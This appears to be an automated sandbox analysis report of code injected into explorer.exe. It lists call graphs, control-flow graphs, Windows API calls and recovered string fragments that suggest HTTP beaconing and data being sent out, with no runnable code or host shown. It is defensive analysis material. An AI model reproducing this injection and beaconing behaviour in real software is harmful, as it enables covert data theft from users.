13649 e4d6382 ObtainUserAgentString 13648->13649 13649->13646 13652 e4d3016 13650->13652 13651 e4d30f0 13651->13621 13652->13651 13655 e4d30bb 13652->13655 13656 e4cf8f2 NtProtectVirtualMemory 13652->13656 13653 e4d30e8 13654 e4d6382 ObtainUserAgentString 13653->13654 13654->13651 13655->13653 13657 e4cf8f2 NtProtectVirtualMemory 13655->13657 13656->13655 13657->13653 13660 e4d3137 13658->13660 13659 e4d32d5 13659->13621 13660->13659 13661 e4cf8f2 NtProtectVirtualMemory 13660->13661 13662 e4d328a 13661->13662 13663 e4cf8f2 NtProtectVirtualMemory 13662->13663 13666 e4d32a9 13663->13666 13664 e4d32cd 13665 e4d6382 ObtainUserAgentString 13664->13665 13665->13659 13666->13664 13667 e4cf8f2 NtProtectVirtualMemory 13666->13667 13667->13664 13669 e4d3349 13668->13669 13670 e4d349f 13669->13670 13673 e4cf8f2 NtProtectVirtualMemory 13669->13673 13671 e4cf8f2 NtProtectVirtualMemory 13670->13671 13672 e4d34c3 13670->13672 13671->13672 13676 e4cf8f2 NtProtectVirtualMemory 13672->13676 13677 e4d3597 13672->13677 13674 e4d3480 13673->13674 13675 e4cf8f2 NtProtectVirtualMemory 13674->13675 13675->13670 13676->13677 13678 e4cf8f2 NtProtectVirtualMemory 13677->13678 13680 e4d35bf 13677->13680 13678->13680 13679 e4d36e1 13681 e4d6382 ObtainUserAgentString 13679->13681 13682 e4cf8f2 NtProtectVirtualMemory 13680->13682 13683 e4d36b9 13680->13683 13684 e4d36e9 13681->13684 13682->13683 13683->13679 13685 e4cf8f2 NtProtectVirtualMemory 13683->13685 13684->13621 13685->13679 13687 e4d3767 13686->13687 13688 e4cf8f2 NtProtectVirtualMemory 13687->13688 13692 e4d3903 13687->13692 13689 e4d38e3 13688->13689 13690 e4cf8f2 NtProtectVirtualMemory 13689->13690 13690->13692 13691 e4d39b7 13693 e4d6382 ObtainUserAgentString 13691->13693 13694 e4cf8f2 NtProtectVirtualMemory 13692->13694 13695 e4d3992 13692->13695 13696 e4d39bf 13693->13696 13694->13695 13695->13691 13697 e4cf8f2 NtProtectVirtualMemory 13695->13697 13696->13621 13697->13691 13699 e4cf987 13698->13699 13701 e4cf9b2 13699->13701 13713 e4d0622 13699->13713 13702 e4cfba2 13701->13702 13704 e4cfac5 13701->13704 13706 e4cfc0c 13701->13706 13703 e4dbe12 NtProtectVirtualMemory 13702->13703 13712 e4cfb5b 13703->13712 13717 e4dbe12 13704->13717 13706->13630 13707 e4dbe12 NtProtectVirtualMemory 13707->13706 13708 e4cfae3 13708->13706 13709 e4cfb3d 13708->13709 13710 e4dbe12 NtProtectVirtualMemory 13708->13710 13711 e4dbe12 NtProtectVirtualMemory 13709->13711 13710->13709 13711->13712 13712->13706 13712->13707 13715 e4d067a 13713->13715 13714 e4d0684 13714->13701 13715->13714 13716 e4dbe12 NtProtectVirtualMemory 13715->13716 13716->13715 13718 e4dbe45 NtProtectVirtualMemory 13717->13718 13721 e4da942 13717->13721 13720 e4dbe70 13718->13720 13720->13708 13722 e4da967 13721->13722 13722->13718 13724 e4d63c7 13723->13724 13727 e4d6232 13724->13727 13726 e4d6438 13726->13637 13728 e4d625e 13727->13728 13731 e4d58c2 13728->13731 13730 e4d626b 13730->13726 13733 e4d5934 13731->13733 13732 e4d59a6 13732->13730 13733->13732 13734 e4d5995 ObtainUserAgentString 13733->13734 13734->13732 13794 e4d042e 13795 e4d045b 13794->13795 13803 e4d04c9 13794->13803 13796 e4da232 NtCreateFile 13795->13796 13795->13803 13797 e4d0496 13796->13797 13798 e4d04c5 13797->13798 13799 e4d0082 NtCreateFile 13797->13799 13800 e4da232 NtCreateFile 13798->13800 13798->13803 13801 e4d04b6 13799->13801 13800->13803 13801->13798 13802 e4cff52 NtCreateFile 13801->13802 13802->13798 13942 e4d772e 13943 e4d7788 connect 13942->13943 13944 e4d776a 13942->13944 13944->13943 13890 e4dcaa9 13891 e4dcaaf 13890->13891 13894 e4d7212 13891->13894 13893 e4dcac7 13895 e4d7237 13894->13895 13896 e4d721b 13894->13896 13895->13893 13896->13895 13897 e4d70c2 6 API calls 13896->13897 13897->13895 13804 e4d622a 13805 e4d625e 13804->13805 13806 e4d58c2 ObtainUserAgentString 13805->13806 13807 e4d626b 13806->13807 13842 e4d72e4 13843 e4d736f 13842->13843 13844 e4d7305 13842->13844 13844->13843 13846 e4d70c2 13844->13846 13847 e4d70cb 13846->13847 13849 e4d71f0 13846->13849 13848 e4daf82 6 API calls 13847->13848 13847->13849 13848->13849 13849->13843 13922 e4d1b66 13923 e4d1b6a 13922->13923 13924 e4d1cce 13923->13924 13925 e4d1cb5 CreateMutexW 13923->13925 13925->13924 13850 e4d4ce2 13852 e4d4dd9 13850->13852 13851 e4d5022 13852->13851 13853 e4d4352 NtCreateFile 13852->13853 13854 e4d4f0d 13853->13854 13854->13851 13855 e4d4792 NtCreateFile 13854->13855 13855->13854 13965 e4d2fbf 13967 e4d3016 13965->13967 13966 e4d30f0 13967->13966 13970 e4d30bb 13967->13970 13971 e4cf8f2 NtProtectVirtualMemory 13967->13971 13968 e4d30e8 13969 e4d6382 ObtainUserAgentString 13968->13969 13969->13966 13970->13968 13972 e4cf8f2 NtProtectVirtualMemory 13970->13972 13971->13970 13972->13968 13898 e4d58be 13899 e4d58c3 13898->13899 13900 e4d5995 ObtainUserAgentString 13899->13900 13901 e4d59a6 13899->13901 13900->13901 13902 e4d70b9 13903 e4d71f0 13902->13903 13904 e4d70ed 13902->13904 13904->13903 13905 e4daf82 6 API calls 13904->13905 13905->13903 13856 e4d30fb 13858 e4d3137 13856->13858 13857 e4d32d5 13858->13857 13859 e4cf8f2 NtProtectVirtualMemory 13858->13859 13860 e4d328a 13859->13860 13861 e4cf8f2 NtProtectVirtualMemory 13860->13861 13864 e4d32a9 13861->13864 13862 e4d32cd 13863 e4d6382 ObtainUserAgentString 13862->13863 13863->13857 13864->13862 13865 e4cf8f2 NtProtectVirtualMemory 13864->13865 13865->13862 13808 e4d983a 13809 e4d9841 13808->13809 13810 e4daf82 6 API calls 13809->13810 13812 e4d98c5 13810->13812 13811 e4d9906 13812->13811 13813 e4da232 NtCreateFile 13812->13813 13813->13811 13930 e4daf7a 13932 e4dafb8 13930->13932 13931 e4db022 13932->13931 13933 e4d75b2 socket 13932->13933 13935 e4db081 13932->13935 13933->13935 13934 e4db134 13934->13931 13936 e4d7732 connect 13934->13936 13938 e4db1b2 13934->13938 13935->13931 13935->13934 13937 e4db117 getaddrinfo 13935->13937 13936->13938 13937->13934 13938->13931 13939 e4d76b2 send 13938->13939 13941 e4db729 13939->13941 13940 e4db7f4 setsockopt recv 13940->13931 13941->13931 13941->13940 13866 e4d32f4 13867 e4d3349 13866->13867 13868 e4d349f 13867->13868 13870 e4cf8f2 NtProtectVirtualMemory 13867->13870 13869 e4cf8f2 NtProtectVirtualMemory 13868->13869 13873 e4d34c3 13868->13873 13869->13873 13871 e4d3480 13870->13871 13872 e4cf8f2 NtProtectVirtualMemory 13871->13872 13872->13868 13874 e4cf8f2 NtProtectVirtualMemory 13873->13874 13875 e4d3597 13873->13875 13874->13875 13876 e4cf8f2 NtProtectVirtualMemory 13875->13876 13878 e4d35bf 13875->13878 13876->13878 13877 e4d36e1 13879 e4d6382 ObtainUserAgentString 13877->13879 13880 e4cf8f2 NtProtectVirtualMemory 13878->13880 13881 e4d36b9 13878->13881 13882 e4d36e9 13879->13882 13880->13881 13881->13877 13883 e4cf8f2 NtProtectVirtualMemory 13881->13883 13883->13877 13949 e4d05f1 13950 e4d060e 13949->13950 13951 e4d0606 13949->13951 13952 e4d5662 6 API calls 13951->13952 13952->13950 13953 e4dc9f1 13954 e4dc9f7 13953->13954 13957 e4d1852 13954->13957 13956 e4dca0f 13958 e4d1865 13957->13958 13959 e4d18e4 13957->13959 13958->13959 13961 e4d1887 13958->13961 13963 e4d187e 13958->13963 13959->13956 13960 e4d736f 13960->13956 13961->13959 13962 e4d5662 6 API calls 13961->13962 13962->13959 13963->13960 13964 e4d70c2 6 API calls 13963->13964 13964->13960 13884 e4cf0f1 13885 e4cf1d3 13884->13885 13886 e4cf109 13884->13886 13887 e4cf012 6 API calls 13886->13887 13888 e4cf113 13887->13888 13888->13885 13889 e4daf82 6 API calls 13888->13889 13889->13885 13973 e4dc9b3 13974 e4dc9bd 13973->13974 13977 e4d16d2 13974->13977 13976 e4dc9e0 13978 e4d1704 13977->13978 13979 e4d16f7 13977->13979 13981 e4d16ff 13978->13981 13982 e4d172d 13978->13982 13984 e4d1737 13978->13984 13980 e4cf0f2 6 API calls 13979->13980 13980->13981 13981->13976 13986 e4d72c2 13982->13986 13984->13981 13985 e4daf82 6 API calls 13984->13985 13985->13981 13987 e4d72df 13986->13987 13988 e4d72cb 13986->13988 13987->13981 13988->13987 13989 e4d70c2 6 API calls 13988->13989 13989->13987 13739 e4da232 13740 e4da25c 13739->13740 13742 e4da334 13739->13742 13741 e4da410 NtCreateFile 13740->13741 13740->13742 13741->13742

                                                    Executed Functions

                                                    Function 0E4DAF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 e4daf82-e4dafb6 1 e4dafb8-e4dafbc 0->1 2 e4dafd6-e4dafd9 0->2 1->2 3 e4dafbe-e4dafc2 1->3 4 e4dafdf-e4dafed 2->4 5 e4db8fe-e4db90c 2->5 3->2 6 e4dafc4-e4dafc8 3->6 7 e4db8f6-e4db8f7 4->7 8 e4daff3-e4daff7 4->8 6->2 9 e4dafca-e4dafce 6->9 7->5 10 e4dafff-e4db000 8->10 11 e4daff9-e4daffd 8->11 9->2 13 e4dafd0-e4dafd4 9->13 12 e4db00a-e4db010 10->12 11->10 11->12 14 e4db03a-e4db060 12->14 15 e4db012-e4db020 12->15 13->2 13->4 17 e4db068-e4db07c call e4d75b2 14->17 18 e4db062-e4db066 14->18 15->14 16 e4db022-e4db026 15->16 16->7 19 e4db02c-e4db035 16->19 22 e4db081-e4db0a2 17->22 18->17 20 e4db0a8-e4db0ab 18->20 19->7 23 e4db144-e4db150 20->23 24 e4db0b1-e4db0b8 20->24 22->20 25 e4db8ee-e4db8ef 22->25 23->25 26 e4db156-e4db165 23->26 27 e4db0ba-e4db0dc call e4da942 24->27 28 e4db0e2-e4db0f5 24->28 25->7 29 e4db17f-e4db18f 26->29 30 e4db167-e4db178 call e4d7552 26->30 27->28 28->25 32 e4db0fb-e4db101 28->32 34 e4db1e5-e4db21b 29->34 35 e4db191-e4db1ad call e4d7732 29->35 30->29 32->25 37 e4db107-e4db109 32->37 41 e4db22d-e4db231 34->41 42 e4db21d-e4db22b 34->42 46 e4db1b2-e4db1da 35->46 37->25 38 e4db10f-e4db111 37->38 38->25 45 e4db117-e4db132 getaddrinfo 38->45 43 e4db247-e4db24b 41->43 44 e4db233-e4db245 41->44 47 e4db27f-e4db280 42->47 48 e4db24d-e4db25f 43->48 49 e4db261-e4db265 43->49 44->47 45->23 50 e4db134-e4db13c 45->50 46->34 52 e4db1dc-e4db1e1 46->52 51 e4db283-e4db2e0 call e4dbd62 call e4d8482 call e4d7e72 call e4dc002 47->51 48->47 53 e4db26d-e4db279 49->53 54 e4db267-e4db26b 49->54 50->23 63 e4db2f4-e4db354 call e4dbd92 51->63 64 e4db2e2-e4db2e6 51->64 52->34 53->47 54->51 54->53 69 e4db48c-e4db4b8 call e4dbd62 call e4dc262 63->69 70 e4db35a-e4db396 call e4dbd62 call e4dc262 call e4dc002 63->70 64->63 65 e4db2e8-e4db2ef call e4d8042 64->65 65->63 79 e4db4d9-e4db590 call e4dc262 * 3 call e4dc002 * 2 call e4d8482 69->79 80 e4db4ba-e4db4d5 69->80 85 e4db398-e4db3b7 call e4dc262 call e4dc002 70->85 86 e4db3bb-e4db3e9 call e4dc262 * 2 70->86 112 e4db595-e4db5b9 call e4dc262 79->112 80->79 85->86 101 e4db3eb-e4db410 call e4dc002 call e4dc262 86->101 102 e4db415-e4db41d 86->102 101->102 105 e4db41f-e4db425 102->105 106 e4db442-e4db448 102->106 109 e4db467-e4db487 call e4dc262 105->109 110 e4db427-e4db43d 105->110 111 e4db44e-e4db456 106->111 106->112 109->112 110->112 111->112 113 e4db45c-e4db45d 111->113 121 e4db5bb-e4db5cc call e4dc262 call e4dc002 112->121 122 e4db5d1-e4db6ad call e4dc262 * 7 call e4dc002 call e4dbd62 call e4dc002 call e4d7e72 call e4d8042 112->122 113->109 132 e4db6af-e4db6b3 121->132 122->132 135 e4db6ff-e4db72d call e4d76b2 132->135 136 e4db6b5-e4db6fa call e4d7382 call e4d77b2 132->136 143 e4db75d-e4db761 135->143 144 e4db72f-e4db735 135->144 152 e4db8e6-e4db8e7 136->152 149 e4db90d-e4db913 143->149 150 e4db767-e4db76b 143->150 144->143 148 e4db737-e4db74c 144->148 148->143 153 e4db74e-e4db754 148->153 154 e4db779-e4db784 149->154 155 e4db919-e4db920 149->155 156 e4db8aa-e4db8df call e4d77b2 150->156 157 e4db771-e4db773 150->157 152->25 153->143 160 e4db756 153->160 161 e4db786-e4db793 154->161 162 e4db795-e4db796 154->162 155->161 156->152 157->154 157->156 160->143 161->162 165 e4db79c-e4db7a0 161->165 162->165 167 e4db7b1-e4db7b2 165->167 168 e4db7a2-e4db7af 165->168 170 e4db7b8-e4db7c4 167->170 168->167 168->170 173 e4db7f4-e4db861 setsockopt recv 170->173 174 e4db7c6-e4db7ef call e4dbd92 call e4dbd62 170->174 177 e4db8a3-e4db8a4 173->177 178 e4db863 173->178 174->173 177->156 178->177 181 e4db865-e4db86a 178->181 181->177 184 e4db86c-e4db872 181->184 184->177 186 e4db874-e4db8a1 184->186 186->177 186->178
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: getaddrinforecvsetsockopt
                                                    • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                    • API String ID: 1564272048-1117930895
                                                    • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                    • Instruction ID: 15870bd6d3e593e71a466f2bf68988e170ebdd28d2c43551dd683b0dda1ce36a
                                                    • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                    • Instruction Fuzzy Hash: 45527131618B088BCB69EF68C4A47EAB7E1FB54300F514A2FD49FC7246DE70A949C751
                                                    Function 0E4DA232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 303 e4da232-e4da256 304 e4da8bd-e4da8cd 303->304 305 e4da25c-e4da260 303->305 305->304 306 e4da266-e4da2a0 305->306 307 e4da2bf 306->307 308 e4da2a2-e4da2a6 306->308 310 e4da2c6 307->310 308->307 309 e4da2a8-e4da2ac 308->309 311 e4da2ae-e4da2b2 309->311 312 e4da2b4-e4da2b8 309->312 313 e4da2cb-e4da2cf 310->313 311->310 312->313 314 e4da2ba-e4da2bd 312->314 315 e4da2f9-e4da30b 313->315 316 e4da2d1-e4da2f7 call e4da942 313->316 314->313 320 e4da378 315->320 321 e4da30d-e4da332 315->321 316->315 316->320 324 e4da37a-e4da3a0 320->324 322 e4da334-e4da33b 321->322 323 e4da3a1-e4da3a8 321->323 325 e4da33d-e4da360 call e4da942 322->325 326 e4da366-e4da370 322->326 327 e4da3aa-e4da3d3 call e4da942 323->327 328 e4da3d5-e4da3dc 323->328 325->326 326->320 332 e4da372-e4da373 326->332 327->320 327->328 329 e4da3de-e4da40a call e4da942 328->329 330 e4da410-e4da458 NtCreateFile call e4da172 328->330 329->320 329->330 339 e4da45d-e4da45f 330->339 332->320 339->320 340 e4da465-e4da46d 339->340 340->320 341 e4da473-e4da476 340->341 342 e4da478-e4da481 341->342 343 e4da486-e4da48d 341->343 342->324 344 e4da48f-e4da4b8 call e4da942 343->344 345 e4da4c2-e4da4ec 343->345 344->320 350 e4da4be-e4da4bf 344->350 351 e4da8ae-e4da8b8 345->351 352 e4da4f2-e4da4f5 345->352 350->345 351->320 353 e4da4fb-e4da4fe 352->353 354 e4da604-e4da611 352->354 355 e4da55e-e4da561 353->355 356 e4da500-e4da507 353->356 354->324 361 e4da567-e4da572 355->361 362 e4da616-e4da619 355->362 358 e4da509-e4da532 call e4da942 356->358 359 e4da538-e4da559 356->359 358->320 358->359 366 e4da5e9-e4da5fa 359->366 367 e4da574-e4da59d call e4da942 361->367 368 e4da5a3-e4da5a6 361->368 364 e4da61f-e4da626 362->364 365 e4da6b8-e4da6bb 362->365 373 e4da628-e4da651 call e4da942 364->373 374 e4da657-e4da66b call e4dbe92 364->374 370 e4da6bd-e4da6c4 365->370 371 e4da739-e4da73c 365->371 366->354 367->320 367->368 368->320 369 e4da5ac-e4da5b6 368->369 369->320 377 e4da5bc-e4da5e6 369->377 378 e4da6f5-e4da734 370->378 379 e4da6c6-e4da6ef call e4da942 370->379 381 e4da7c4-e4da7c7 371->381 382 e4da742-e4da749 371->382 373->320 373->374 374->320 391 e4da671-e4da6b3 374->391 377->366 401 e4da894-e4da8a9 378->401 379->351 379->378 381->320 387 e4da7cd-e4da7d4 381->387 384 e4da74b-e4da774 call e4da942 382->384 385 e4da77a-e4da7bf 382->385 384->351 384->385 385->401 392 e4da7fc-e4da803 387->392 393 e4da7d6-e4da7f6 call e4da942 387->393 391->324 399 e4da82b-e4da835 392->399 400 e4da805-e4da825 call e4da942 392->400 393->392 399->351 402 e4da837-e4da83e 399->402 400->399 401->324 402->351 406 e4da840-e4da886 402->406 406->401
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: `
                                                    • API String ID: 823142352-2679148245
                                                    • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                    • Instruction ID: e6e34d5396128844556de2b8e32638e924c8f44d0c0f05a01bd674cb2c76d1a0
                                                    • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                    • Instruction Fuzzy Hash: 6E224D70A18A099FCB59DF68C4A86AEF7E1FB98301F40462FE45ED3250DB30E855DB85
                                                    Function 0E4DBE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 447 e4dbe12-e4dbe38 448 e4dbe45-e4dbe6e NtProtectVirtualMemory 447->448 449 e4dbe40 call e4da942 447->449 450 e4dbe7d-e4dbe8f 448->450 451 e4dbe70-e4dbe7c 448->451 449->448
                                                    APIs
                                                    • NtProtectVirtualMemory.NTDLL ref: 0E4DBE67
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2706961497-0
                                                    • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                    • Instruction ID: e303e7de4338020010ef2c6361804af55ccf7a62d7117892250dcc7428bfe712
                                                    • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                    • Instruction Fuzzy Hash: 2D019E30628B484F8B88EF6C948022AB7E4FBD9214F000B3EE99AC3250EB60C9414742
                                                    Function 0E4DBE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 452 e4dbe0a-e4dbe6e call e4da942 NtProtectVirtualMemory 455 e4dbe7d-e4dbe8f 452->455 456 e4dbe70-e4dbe7c 452->456
                                                    APIs
                                                    • NtProtectVirtualMemory.NTDLL ref: 0E4DBE67
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2706961497-0
                                                    • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                    • Instruction ID: 0c304a6500eb2a10b1f476654c10508b68274cf2f4ca07500951ff2e9400f122
                                                    • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                    • Instruction Fuzzy Hash: 1A01A23462CB884B8B48EB6C94512A6B3E5FBCE314F000B7FE99AC3240DB61D9064782
                                                    Function 0E4D58C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • ObtainUserAgentString.URLMON ref: 0E4D59A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: AgentObtainStringUser
                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                    • API String ID: 2681117516-319646191
                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                    • Instruction ID: cf808336960f510071f721c6e574333e54c2c25f5c8fd79546723be30017ab72
                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                    • Instruction Fuzzy Hash: 1A31DF31618A0C8BCB05EFA9C8947EEB7E1FB58215F40062FD44ED7240DE788A49C789
                                                    Function 0E4D58BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • ObtainUserAgentString.URLMON ref: 0E4D59A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: AgentObtainStringUser
                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                    • API String ID: 2681117516-319646191
                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                    • Instruction ID: 922b587f63878f4feb806e6ec86f4deb64008761e50289c01ff242696a286602
                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                    • Instruction Fuzzy Hash: 4421F570618A0C8BCB05EFA9C8A47EEBBE1FF58204F40061FD45AD7240DF748A08C789
                                                    Function 0E4D1B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 232 e4d1b66-e4d1b68 233 e4d1b6a-e4d1b6b 232->233 234 e4d1b93-e4d1bb8 232->234 235 e4d1b6d-e4d1b71 233->235 236 e4d1bbe-e4d1c22 call e4d8612 call e4da942 * 2 233->236 237 e4d1bbb-e4d1bbc 234->237 235->237 238 e4d1b73-e4d1b92 235->238 246 e4d1cdc 236->246 247 e4d1c28-e4d1c2b 236->247 237->236 238->234 249 e4d1cde-e4d1cf6 246->249 247->246 248 e4d1c31-e4d1cd3 call e4dcda4 call e4dc022 call e4dc3e2 call e4dc022 call e4dc3e2 CreateMutexW 247->248 248->246 263 e4d1cd5-e4d1cda 248->263 263->249
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID: .dll$el32$kern
                                                    • API String ID: 1964310414-1222553051
                                                    • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                    • Instruction ID: 91206b54e7549079cbe26b5090dcdea764536aecd6522e6084ef0d70bfcc075f
                                                    • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                    • Instruction Fuzzy Hash: 1C416F70918A0C8FDB55EFA8C8E47ADB7E0FB58300F44467BC84ADB255DE349949CB85
                                                    Function 0E4D1B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID: .dll$el32$kern
                                                    • API String ID: 1964310414-1222553051
                                                    • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                    • Instruction ID: b4e7ba0979064e68e7a1e342acf9cacc05a07020ca070c47250b9fdbc6c46c28
                                                    • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                    • Instruction Fuzzy Hash: F6412A70918A088FDB95EFA8C4D87ADB7E0FB68300F44456BC84ADB255DE349949CB85
                                                    Function 0E4D772E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 293 e4d772e-e4d7768 294 e4d7788-e4d77ab connect 293->294 295 e4d776a-e4d7782 call e4da942 293->295 295->294
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                    • Instruction ID: f58b49679c0f5c24535aa83070acf07174810238ca3de44608e0ce59f1531c87
                                                    • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                    • Instruction Fuzzy Hash: 56015E30618B188FCB84EF5CE088B55B7E0FB58324F1545AED90DCB226C674DC858BC2
                                                    Function 0E4D7732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 298 e4d7732-e4d7768 299 e4d7788-e4d77ab connect 298->299 300 e4d776a-e4d7782 call e4da942 298->300 300->299
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                    • Instruction ID: 0b46e5aafc861add50c0240425c89af8d5a18a45fe9bcf1fdbd777c69597fbb5
                                                    • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                    • Instruction Fuzzy Hash: A9012170618A1C8FCB84EF5CE048B5577E0FB59314F1545AE980DCB226C674CD858BC2
                                                    Function 0E4D76B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 411 e4d76b2-e4d76e5 412 e4d7705-e4d772d send 411->412 413 e4d76e7-e4d76ff call e4da942 411->413 413->412
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
